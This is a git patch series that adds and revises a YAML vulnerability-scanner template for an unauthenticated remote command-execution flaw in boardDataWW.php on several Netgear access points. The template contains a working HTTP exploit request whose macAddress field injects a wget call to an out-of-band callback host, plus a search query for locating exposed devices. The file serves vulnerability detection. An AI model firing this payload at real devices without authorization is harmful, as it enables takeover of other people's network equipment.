From 9ac9c195d7202f840cc8ad216c0be88301fb17dd Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 23 May 2024 18:27:16 +0530
Subject: [PATCH 1/3] Create netgear-boarddataww-rce.yaml
---
http/iot/netgear-boarddataww-rce.yaml | 39 +++++++++++++++++++++++++++
1 file changed, 39 insertions(+)
create mode 100644 http/iot/netgear-boarddataww-rce.yaml
diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml
new file mode 100644
index 0000000000..c83be5cafd
--- /dev/null
+++ b/http/iot/netgear-boarddataww-rce.yaml
@@ -0,0 +1,39 @@
+id: netgear-boarddataww-rce
+
+info:
+ name: Netgear router boardDataWW.php - Remote Code Execution
+ author: pussycat0x
+ severity: high
+ description: |
+ There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash.
+ reference:
+ - https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ fofa-query: title=="Netgear"
+ tags: rce,netgear,iot
+
+http:
+ - raw:
+ - |
+ POST /boardDataWW.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: application/x-www-form-urlencoded
+
+ macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: word
+ part: body
+ words:
+ - "Netgear"
+
+ - type: status
+ status:
+ - 200
From 0551ac2a392f3c4ff5a72763f4c453937d87bdb3 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Mon, 27 May 2024 20:55:22 +0530
Subject: [PATCH 2/3] lint - fix
---
http/iot/netgear-boarddataww-rce.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml
index c83be5cafd..56d5921e84 100644
--- a/http/iot/netgear-boarddataww-rce.yaml
+++ b/http/iot/netgear-boarddataww-rce.yaml
@@ -19,7 +19,7 @@ http:
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
-
+
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit
matchers-condition: and
From 051002ec78e6aca5dad8df6734dbf74ea895785c Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 29 May 2024 13:43:14 +0530
Subject: [PATCH 3/3] minor update
---
http/iot/netgear-boarddataww-rce.yaml | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml
index 56d5921e84..7609c7043a 100644
--- a/http/iot/netgear-boarddataww-rce.yaml
+++ b/http/iot/netgear-boarddataww-rce.yaml
@@ -1,15 +1,18 @@
id: netgear-boarddataww-rce
info:
- name: Netgear router boardDataWW.php - Remote Code Execution
+ name: Netgear Devices boardDataWW.php Unauthenticated Remote Command Execution
author: pussycat0x
- severity: high
+ severity: critical
description: |
- There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash.
+ boardDataWW.php in Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute arbitrary commands.
reference:
- https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md
+ - https://github.com/gobysec/GobyVuls/blob/master/Netgear_Devices_boardDataWW.php_Unauthenticated_Remote_Command_Execution.md
metadata:
fofa-query: title=="Netgear"
+ verified: true
+ max-request: 1
tags: rce,netgear,iot
http: